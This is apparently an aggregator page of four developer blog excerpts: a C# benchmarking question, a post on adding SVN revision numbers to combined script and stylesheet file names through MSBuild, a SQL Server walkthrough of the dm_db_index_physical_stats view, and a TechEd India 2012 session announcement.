    i made a class which helps me measure time for any methods in Ticks. Basically, it runs testing method 100x, and force GC, then it records time taken for another 100x method runs. x64 release ctrl+f5 VS2012/VS2010 the results are following: 2,914 2,909 2,913 2,909 2,908 2,907 2,909 2,998 2,976 2,855 2,446 2,415 2,435 2,401 2,402 2,402 2,399 2,401 2,401 2,400 2,399 2,400 2,404 2,402 2,401 2,399 2,400 2,402 2,404 2,403 2,401 2,403 2,401 2,400 2,399 2,414 2,405 2,401 2,407 2,399 2,401 2,402 2,401 2,404 2,401 2,404 2,405 2,368 1,577 1,579 1,626 1,578 1,576 1,578 1,577 1,577 1,576 1,578 1,576 1,578 1,577 1,578 1,576 1,578 1,577 1,579 1,585 1,576 1,579 1,577 1,579 1,578 1,579 1,577 1,578 1,577 1,578 1,576 1,578 1,577 1,578 1,599 1,579 1,578 1,582 1,576 1,578 1,576 1,579 1,577 1,578 1,577 1,591 1,577 1,578 1,578 1,576 1,578 1,576 1,578 As you can see there are 3 phases, first is ~2,900, second is ~2,400, then ~1,550 What might be the reason to cause it? the test performance class code follows: public static void RunTests(Func<long> myTest) { const int numTrials = 100; Stopwatch sw = new Stopwatch(); double[] sample = new double[numTrials]; Console.WriteLine("Checksum is {0:N0}", myTest()); sw.Start(); myTest(); sw.Stop(); Console.WriteLine("Estimated time per test is {0:N0} ticks\n", sw.ElapsedTicks); for (int i = 0; i < numTrials; i++) { myTest(); } GC.Collect(); string testName = myTest.Method.Name; Console.WriteLine("----> Starting benchmark {0}\n", myTest.Method.Name); for (int i = 0; i < numTrials; i++) { sw.Restart(); myTest(); sw.Stop(); sample[i] = sw.ElapsedTicks; } double testResult = DataSetAnalysis.Report(sample); for (int j = 0; j < numTrials; j = j + 5) Console.WriteLine("{0,8:N0} {1,8:N0} {2,8:N0} {3,8:N0} {4,8:N0}", sample[j], sample[j + 1], sample[j + 2], sample[j + 3], sample[j + 4]); Console.WriteLine("\n----> End of benchmark"); }

    Read the article

  • Web Site Performance and Assembly Versioning – Part 2 Versioning Combined Files Using Subversion

    - by capgpilk
    Ok so it took a while to post this second part. Many apologies, we had a big roll out of a new platform at work and many things had to get sidelined. So this is the second part in a short series of website performance and using versioning to help improve it. Minification and Concatination of JavaScript and CSS Files Versioning Combined Files Using Subversion – this post Versioning Combined Files Using Mercurial – published shortly In the previous post we used AjaxMin to shrink js and css files then concatenated them into one file each which had the file name of site-script.combined.min.js and site-style.combined.min.css. These file names are fine, but you can configure IIS 7 to cache these static files and so lower the amount of data transferred between server and client. This is done by editing the response headers in IIS. 1. In IIS7 Manager, choose the directory where these files are located and select HTTP Response Headers. 2. Check the Expire Web Content and set a time period well into the future. 3. When refreshing the web page, the server will respond with HTTP 304 forcing the browser to retrieve the file from its cache. 4. As can be seen in FireBug, the Cache-Control header has a max age of 31536000 seconds which equates to 365 days.   The server will always send this HTTP 304 message unless the file changes forcing it to send new content. To help force this we can change the file name based on the latest build using the SVN revision number in the filename. So we have lowered data transfer on content that hasn’t changed, but forced it to be sent when you have made a change to the css or js files. Now to get the SVN revision number in to the file name. 1. Import the MSBuildCommunityTasks targets which can be dowloaded from here. 1: <Import Project="$(MSBuildExtensionsPath) 2: \MSBuildCommunityTasks 3: \MSBuild.Community.Tasks.Targets" /> 2. Edit the BeforeBuild target to call out to svn and get the latest revision 1: <SvnVersion LocalPath="$(MSBuildProjectDirectory)" 2: ToolPath="$(ProgramFiles)\VisualSVN Server\bin"> 3: <Output TaskParameter="Revision" PropertyName="Revision" /> 4: </SvnVersion> 3. Set it to update the project AssemblyInfo.cs file for the svn revision. 1: <FileUpdate Files="Properties\AssemblyInfo.cs" 2: Regex="(\d+)\.(\d+)\.(\d+)\.(\d+)" 3: ReplacementText="$1.$2.$3.$(Revision)" /> 4. Now edit the AfterBuild target to get the full dll version. You could combine these two steps and just get the version from svn, I am working on one project that updates the AssemblyInfo file and another project that allows manual editing of the file, but needs that version within the file name; so I just combined the two for this post. 1: <MSBuild.ExtensionPack.Framework.Assembly 2: TaskAction="GetInfo" 3: NetAssembly="$(OutputPath)\mydll.dll"> 4: <Output TaskParameter="OutputItems" ItemName="Info" /> 5: </MSBuild.ExtensionPack.Framework.Assembly> 6: <Message Text="Version: %(Info.AssemblyVersion)" 7: Importance="High" /> 5. Use this Info.AssemblyVersion to write out the combined css and js files as described in the last post. 1: <WriteLinestoFile File="Scripts\site-%(Info.AssemblyVersion).combined.min.js" 2: Lines="@(JSLinesSite)" Overwrite="true" />   In the next post I will cover doing the same, but for a Mercurial repository.

    Read the article

  • quick look at: dm_db_index_physical_stats

    - by fatherjack
    A quick look at the key data from this dmv that can help a DBA keep databases performing well and systems online as the users need them. When the dynamic management views relating to index statistics became available in SQL Server 2005 there was much hype about how they can help a DBA keep their servers running in better health than ever before. This particular view gives an insight into the physical health of the indexes present in a database. Whether they are use or unused, complete or missing some columns is irrelevant, this is simply the physical stats of all indexes; disabled indexes are ignored however. In it’s simplest form this dmv can be executed as:   The results from executing this contain a record for every index in every database but some of the columns will be NULL. The first parameter is there so that you can specify which database you want to gather index details on, rather than scan every database. Simply specifying DB_ID() in place of the first NULL achieves this. In order to avoid the NULLS, or more accurately, in order to choose when to have the NULLS you need to specify a value for the last parameter. It takes one of 4 values – DEFAULT, ‘SAMPLED’, ‘LIMITED’ or ‘DETAILED’. If you execute the dmv with each of these values you can see some interesting details in the times taken to complete each step. DECLARE @Start DATETIME DECLARE @First DATETIME DECLARE @Second DATETIME DECLARE @Third DATETIME DECLARE @Finish DATETIME SET @Start = GETDATE() SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, DEFAULT) AS ddips SET @First = GETDATE() SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'SAMPLED') AS ddips SET @Second = GETDATE() SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'LIMITED') AS ddips SET @Third = GETDATE() SELECT * FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, 'DETAILED') AS ddips SET @Finish = GETDATE() SELECT DATEDIFF(ms, @Start, @First) AS [DEFAULT] , DATEDIFF(ms, @First, @Second) AS [SAMPLED] , DATEDIFF(ms, @Second, @Third) AS [LIMITED] , DATEDIFF(ms, @Third, @Finish) AS [DETAILED] Running this code will give you 4 result sets; DEFAULT will have 12 columns full of data and then NULLS in the remainder. SAMPLED will have 21 columns full of data. LIMITED will have 12 columns of data and the NULLS in the remainder. DETAILED will have 21 columns full of data. So, from this we can deduce that the DEFAULT value (the same one that is also applied when you query the view using a NULL parameter) is the same as using LIMITED. Viewing the final result set has some details that are worth noting: Running queries against this view takes significantly longer when using the SAMPLED and DETAILED values in the last parameter. The duration of the query is directly related to the size of the database you are working in so be careful running this on big databases unless you have tried it on a test server first. Let’s look at the data we get back with the DEFAULT value first of all and then progress to the extra information later. We know that the first parameter that we supply has to be a database id and for the purposes of this blog we will be providing that value with the DB_ID function. We could just as easily put a fixed value in there or a function such as DB_ID (‘AnyDatabaseName’). The first columns we get back are database_id and object_id. These are pretty explanatory and we can wrap those in some code to make things a little easier to read: SELECT DB_NAME([ddips].[database_id]) AS [DatabaseName] , OBJECT_NAME([ddips].[object_id]) AS [TableName] … FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, NULL) AS ddips  gives us   SELECT DB_NAME([ddips].[database_id]) AS [DatabaseName] , OBJECT_NAME([ddips].[object_id]) AS [TableName], [i].[name] AS [IndexName] , ….. FROM [sys].[dm_db_index_physical_stats](DB_ID(), NULL, NULL, NULL, NULL) AS ddips INNER JOIN [sys].[indexes] AS i ON [ddips].[index_id] = [i].[index_id] AND [ddips].[object_id] = [i].[object_id]     These handily tie in with the next parameters in the query on the dmv. If you specify an object_id and an index_id in these then you get results limited to either the table or the specific index. Once again we can place a  function in here to make it easier to work with a specific table. eg. SELECT * FROM [sys].[dm_db_index_physical_stats] (DB_ID(), OBJECT_ID(‘AdventureWorks2008.Person.Address’) , 1, NULL, NULL) AS ddips   Note: Despite me showing that functions can be placed directly in the parameters for this dmv, best practice recommends that functions are not used directly in the function as it is possible that they will fail to return a valid object ID. To be certain of not passing invalid values to this function, and therefore setting an automated process off on the wrong path, declare variables for the OBJECT_IDs and once they have been validated, use them in the function: DECLARE @db_id SMALLINT; DECLARE @object_id INT; SET @db_id = DB_ID(N’AdventureWorks_2008′); SET @object_id = OBJECT_ID(N’AdventureWorks_2008.Person.Address’); IF @db_id IS NULL BEGINPRINT N’Invalid database’; ENDELSE IF @object_id IS NULL BEGINPRINT N’Invalid object’; ENDELSE BEGINSELECT * FROM sys.dm_db_index_physical_stats (@db_id, @object_id, NULL, NULL , ‘LIMITED’); END; GO In cases where the results of querying this dmv don’t have any effect on other processes (i.e. simply viewing the results in the SSMS results area)  then it will be noticed when the results are not consistent with the expected results and in the case of this blog this is the method I have used. So, now we can relate the values in these columns to something that we recognise in the database lets see what those other values in the dmv are all about. The next columns are: We’ll skip partition_number, index_type_desc, alloc_unit_type_desc, index_depth and index_level  as this is a quick look at the dmv and they are pretty self explanatory. The final columns revealed by querying this view in the DEFAULT mode are avg_fragmentation_in_percent. This is the amount that the index is logically fragmented. It will show NULL when the dmv is queried in SAMPLED mode. fragment_count. The number of pieces that the index is broken into. It will show NULL when the dmv is queried in SAMPLED mode. avg_fragment_size_in_pages. The average size, in pages, of a single fragment in the leaf level of the IN_ROW_DATA allocation unit. It will show NULL when the dmv is queried in SAMPLED mode. page_count. Total number of index or data pages in use. OK, so what does this give us? Well, there is an obvious correlation between fragment_count, page_count and avg_fragment_size-in_pages. We see that an index that takes up 27 pages and is in 3 fragments has an average fragment size of 9 pages (27/3=9). This means that for this index there are 3 separate places on the hard disk that SQL Server needs to locate and access to gather the data when it is requested by a DML query. If this index was bigger than 72KB then having it’s data in 3 pieces might not be too big an issue as each piece would have a significant piece of data to read and the speed of access would not be too poor. If the number of fragments increases then obviously the amount of data in each piece decreases and that means the amount of work for the disks to do in order to retrieve the data to satisfy the query increases and this would start to decrease performance. This information can be useful to keep in mind when considering the value in the avg_fragmentation_in_percent column. This is arrived at by an internal algorithm that gives a value to the logical fragmentation of the index taking into account the multiple files, type of allocation unit and the previously mentioned characteristics if index size (page_count) and fragment_count. Seeing an index with a high avg_fragmentation_in_percent value will be a call to action for a DBA that is investigating performance issues. It is possible that tables will have indexes that suffer from rapid increases in fragmentation as part of normal daily business and that regular defragmentation work will be needed to keep it in good order. In other cases indexes will rarely become fragmented and therefore not need rebuilding from one end of the year to another. Keeping this in mind DBAs need to use an ‘intelligent’ process that assesses key characteristics of an index and decides on the best, if any, defragmentation method to apply should be used. There is a simple example of this in the sample code found in the Books OnLine content for this dmv, in example D. There are also a couple of very popular solutions created by SQL Server MVPs Michelle Ufford and Ola Hallengren which I would wholly recommend that you review for much further detail on how to care for your SQL Server indexes. Right, let’s get back on track then. Querying the dmv with the fifth parameter value as ‘DETAILED’ takes longer because it goes through the index and refreshes all data from every level of the index. As this blog is only a quick look a we are going to skate right past ghost_record_count and version_ghost_record_count and discuss avg_page_space_used_in_percent, record_count, min_record_size_in_bytes, max_record_size_in_bytes and avg_record_size_in_bytes. We can see from the details below that there is a correlation between the columns marked. Column 1 (Page_Count) is the number of 8KB pages used by the index, column 2 is how full each page is (how much of the 8KB has actual data written on it), column 3 is how many records are recorded in the index and column 4 is the average size of each record. This approximates to: ((Col1*8) * 1024*(Col2/100))/Col3 = Col4*. avg_page_space_used_in_percent is an important column to review as this indicates how much of the disk that has been given over to the storage of the index actually has data on it. This value is affected by the value given for the FILL_FACTOR parameter when creating an index. avg_record_size_in_bytes is important as you can use it to get an idea of how many records are in each page and therefore in each fragment, thus reinforcing how important it is to keep fragmentation under control. min_record_size_in_bytes and max_record_size_in_bytes are exactly as their names set them out to be. A detail of the smallest and largest records in the index. Purely offered as a guide to the DBA to better understand the storage practices taking place. So, keeping an eye on avg_fragmentation_in_percent will ensure that your indexes are helping data access processes take place as efficiently as possible. Where fragmentation recurs frequently then potentially the DBA should consider; the fill_factor of the index in order to leave space at the leaf level so that new records can be inserted without causing fragmentation so rapidly. the columns used in the index should be analysed to avoid new records needing to be inserted in the middle of the index but rather always be added to the end. * – it’s approximate as there are many factors associated with things like the type of data and other database settings that affect this slightly.  Another great resource for working with SQL Server DMVs is Performance Tuning with SQL Server Dynamic Management Views by Louis Davidson and Tim Ford – a free ebook or paperback from Simple Talk. Disclaimer – Jonathan is a Friend of Red Gate and as such, whenever they are discussed, will have a generally positive disposition towards Red Gate tools. Other tools are often available and you should always try others before you come back and buy the Red Gate ones. All code in this blog is provided “as is” and no guarantee, warranty or accuracy is applicable or inferred, run the code on a test server and be sure to understand it before you run it on a server that means a lot to you or your manager.

    Read the article

  • SQL SERVER – SQL Server Misconceptions and Resolution – A Practical Perspective – TechEd 2012 India

    - by pinaldave
    TechEd India 2012 is just around the corner and I will be presenting there in two different sessions. On the very first day of this event, my presentation will be all about SQL Server Misconceptions and Resolution – A Practical Perspective. The dictionary tells us that a “misconception” means a view or opinion that is incorrect and is based on faulty thinking or understanding. In SQL Server, there are so many misconceptions. In fact, when I hear some of these misconceptions, I feel like fainting at that very moment! Seriously, at one time, I came across the scenario where instead of using INSERT INTO…SELECT, the developer used CURSOR believing that cursor is faster (duh!). Here is the link the blog post related to this. Pinal and Vinod in 2009 I have been presenting in TechEd India for last three years. This is my fourth opportunity to present a technical session on SQL Server. Just like the previous years, I decided to present something different. Here is a novelty of this year: I will be presenting this session with Vinod Kumar. Vinod Kumar and I have a great synergy when we work together. So far, we have written one SQL Server Interview Questions and Answers book and 2 video courses: (1) SQL Server Questions and Answers (2) SQL Server Performance: Indexing Basics. Pinal and Vinod in 2011 When we sat together and started building an outline for this course, we had many options in mind for this tango session. However, we have decided that we will make this session as lively as possible while keeping it natural at the same time. We know our flow and we know our conversation highlight, but we do not know what exactly each of us is going to present. We have decided to challenge each other on stage and push each other’s knowledge to the verge. We promise that the session will be entertaining with lots of SQL Server trivia, tips and tricks. Here are the challenges that I’ll take on: I will puzzle Vinod with my difficult questions I will present such misconception that Vinod will have no resolution for it. I need your help.  Will you help me stump Vinod? If yes, come and attend our session and join me to prove that together we are superior (a friendly brain clash, but we must win!). SQL Server enthusiasts and SQL Server fans are going to have gala time at #TechEdIn as we have a very solid lineup of the speaker and extremely interesting sessions at TechEdIn. Read the complete blog post of Vinod. Session Details Title: SQL Server Misconceptions and Resolution – A Practical Perspective (Add to Calendar) Abstract: “Earth is flat”! – An ancient common misconception, which has been proven incorrect as we progressed in modern times. In this session we will see various database misconceptions prevailing and their resolution with the aid of the demos. In this unique session audience will be part of the conversation and resolution. Date and Time: March 21, 2012, 15:15 to 16:15 Location: Hotel Lalit Ashok - Kumara Krupa High Grounds, Bengaluru – 560001, Karnataka, India. Add to Calendar Please submit your questions in the comments area and I will be for sure discussing them during my session. If I pick your question to discuss during my session, here is your gift I commit right now – SQL Server Interview Questions and Answers Book. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL Interview Questions and Answers, SQL Performance, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology Tagged: TechEd, TechEdIn

    Read the article

< Previous Page | 289 290 291 292 293 294 295 296 297 298 299 300  | Next Page >